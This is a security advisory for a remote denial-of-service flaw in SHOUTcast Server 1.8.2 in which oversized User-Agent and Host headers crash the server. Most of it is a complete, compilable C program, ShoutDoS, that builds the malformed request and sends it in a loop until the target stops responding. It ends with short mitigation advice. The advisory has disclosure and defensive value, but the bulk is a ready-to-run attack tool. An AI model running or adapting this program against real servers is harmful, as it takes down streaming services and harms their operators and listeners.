COMMAND

    WinAMP

SYSTEMS AFFECTED

    SHOUTcast Server 1.8.2 (Linux and Win32 confirmed; other platforms untested)

PROBLEM

    'FraMe' found the following.  SHOUTcast Server is a streaming audio
    server.  A malformed client HTTP request can crash the server.

    The server crashes after receiving approximately seven client HTTP
    requests whose User-Agent and Host header fields each carry a very
    long value (about 4 KB).

    A proof-of-concept denial-of-service program in C follows.

    /*
     * ShoutDoS: Remote Denial of Service SHOUTcast Server
     *
     * ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
     *
     * Tested:
     *	  SHOUTcast Server 1.8.2 Linux
     *	  SHOUTcast Server 1.8.2 Win32
     *
    */
    
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <sys/errno.h>
    #include <sys/param.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    
    /* Print the tool banner (name line and author line) to stdout. */
    void msg(void) {
        static const char *const banner[] = {
            "ShoutDoS: Remote Denial of Service SHOUTcast Server",
            "ShoutDoS (C) 2001 FraMe <frame@hispalab.com>",
        };
        for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
            puts(banner[i]);   /* puts() appends the newline */
        }
    }
    
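    /*
     * Length of the filler placed in each oversized header field, and the
     * size of the scratch buffer used for the (discarded) server reply.
     * The advisory describes the trigger as roughly 4 KB per field; the
     * original listing embedded the filler as one enormous string literal,
     * which is built here at run time instead.
     */
    enum { FILL_LEN = 4096, REPLY_LEN = 512 };

    /* Filler patterns the original listing repeated in the two header fields. */
    static const char UA_PATTERN[]   = "SHOUTcastDenialofService";
    static const char HOST_PATTERN[] = "your.server.go.crash.now.";

    /*
     * Write exactly `len` bytes of `pattern` repeated into `dst`.
     * `dst` is not NUL-terminated here; the caller terminates it.
     */
    static void fill_repeat(char *dst, size_t len, const char *pattern) {
        size_t plen = strlen(pattern);
        for (size_t i = 0; i < len; i++) {
            dst[i] = pattern[i % plen];
        }
    }

    /*
     * Assemble the malformed HTTP request into `req` (capacity `cap`).
     * Returns the request length in bytes, or -1 if `cap` is too small.
     */
    static int build_request(char *req, size_t cap) {
        char ua[FILL_LEN + 1];
        char host[FILL_LEN + 1];

        fill_repeat(ua, FILL_LEN, UA_PATTERN);
        fill_repeat(host, FILL_LEN, HOST_PATTERN);
        ua[FILL_LEN] = '\0';
        host[FILL_LEN] = '\0';

        int n = snprintf(req, cap,
                         "GET / HTTP/1.0\r\n"
                         "User-Agent: %s\r\n"
                         "Host: %s\r\n"
                         "Authorization: Basic\r\n"
                         "\r\n",
                         ua, host);
        if (n < 0 || (size_t)n >= cap) {
            return -1;   /* truncated: the request would be malformed differently */
        }
        return n;
    }

    /*
     * Parse a TCP port from `text`.  Returns the port, or -1 when the text is
     * not a whole number in 1..65535 (the original used atoi() unchecked, so
     * "abc" silently became port 0).
     */
    static int parse_port(const char *text) {
        char *end;
        errno = 0;
        long v = strtol(text, &end, 10);
        if (end == text || *end != '\0' || errno == ERANGE || v < 1 || v > 65535) {
            return -1;
        }
        return (int)v;
    }

    /*
     * write() the whole of `buf` to `fd`, retrying on short writes and EINTR.
     * Returns 0 on success, -1 on error (errno set by write()).
     */
    static int send_all(int fd, const char *buf, size_t len) {
        while (len > 0) {
            ssize_t w = write(fd, buf, len);
            if (w < 0) {
                if (errno == EINTR) {
                    continue;
                }
                return -1;
            }
            buf += w;
            len -= (size_t)w;
        }
        return 0;
    }

    /*
     * Entry point.  Usage: <prog> ip port
     *
     * Resolves the target, probes the port once, then loops: open a fresh
     * connection, send the oversized request, read and discard the reply,
     * close.  The loop ends when connect() fails, which the tool reports as
     * "Server Crash!".  Exit status is 1 on every path (the loop never
     * returns normally), matching the original.
     */
    int main(int argc, char **argv) {
        struct sockaddr_in sa;
        struct hostent *SHOUTserver;
        char request[2 * FILL_LEN + 128];
        char rbuff[REPLY_LEN];
        int port, len, s;

        if (argc != 3) {
            msg();
            /* argv[0] can be NULL when the program is exec'd with an empty argv. */
            printf("Usage: %s ip port\n", argv[0] ? argv[0] : "shoutdos");
            exit(1);
        }

        port = parse_port(argv[2]);
        if (port < 0) {
            msg();
            printf("Error: port must be a number in 1..65535\n");
            exit(1);
        }

        if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
            msg();
            printf("Error: gethostbyname()\n");
            exit(1);
        }
        /*
         * The original memcpy'd h_addr into sin_addr without checking the
         * family or length; only a 4-byte IPv4 address fits there.
         */
        if (SHOUTserver->h_addrtype != AF_INET ||
            SHOUTserver->h_length != (int)sizeof(sa.sin_addr) ||
            SHOUTserver->h_addr_list[0] == NULL) {
            msg();
            printf("Error: target did not resolve to an IPv4 address\n");
            exit(1);
        }

        memset(&sa, 0, sizeof(sa));   /* original left sin_zero uninitialised */
        memcpy(&sa.sin_addr, SHOUTserver->h_addr_list[0], sizeof(sa.sin_addr));
        sa.sin_family = AF_INET;
        sa.sin_port = htons((unsigned short)port);

        len = build_request(request, sizeof(request));
        if (len < 0) {
            msg();
            printf("Error: request buffer too small\n");
            exit(1);
        }

        /* Probe once so a closed/filtered port is reported before the loop. */
        if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            msg();
            printf("Error: socket()\n");
            exit(1);
        }
        if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
            msg();
            printf("Error: connect()\n");
            close(s);
            exit(1);
        }
        close(s);

        msg();
        printf("Connect. The host appears be up...\n");
        printf("Doing DoS ");
        fflush(stdout);

        /*
         * Original used a label + goto; this is the same unbounded loop.
         * NOTE: a failed connect() is reported as a crash, but it can also
         * mean a full listen backlog, a filter, or the target being
         * restarted; treat the message as a hint, not proof of a crash.
         */
        for (;;) {
            if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
                printf(" Error!\n");
                exit(1);
            }
            if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
                printf(" Server Crash!\n");
                close(s);
                exit(1);
            }
            /* The original ignored write()'s result; a short write would have
             * sent a truncated request and carried on silently. */
            if (send_all(s, request, (size_t)len) < 0) {
                printf(" Error: write()\n");
                close(s);
                exit(1);
            }
            /* Reply is read only to let the server finish; contents unused. */
            (void)read(s, rbuff, sizeof(rbuff));
            close(s);
            printf(".");
            fflush(stdout);   /* without this no progress dot shows until exit */
        }
    }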
    
    /* EOF */

SOLUTION

    No vendor fix was available at the time of writing.  Until one is,
    exposure can be reduced by restricting access to the SHOUTcast
    listening port to trusted networks, by fronting the server with a
    proxy that rejects requests carrying oversized header fields (the
    request shape described above), and by running the server under a
    supervisor that restarts it after a crash.